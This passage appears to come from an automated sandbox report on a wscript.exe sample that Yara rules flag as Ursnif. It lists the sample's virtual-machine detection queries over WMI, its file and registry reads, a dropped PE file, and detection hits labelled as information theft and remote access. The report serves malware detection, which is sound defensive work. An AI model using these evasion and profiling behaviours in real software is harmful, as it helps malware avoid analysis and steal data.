Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.236288354.000001B818AB5000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: digram.it.0.dr

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation (8 occurrences)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY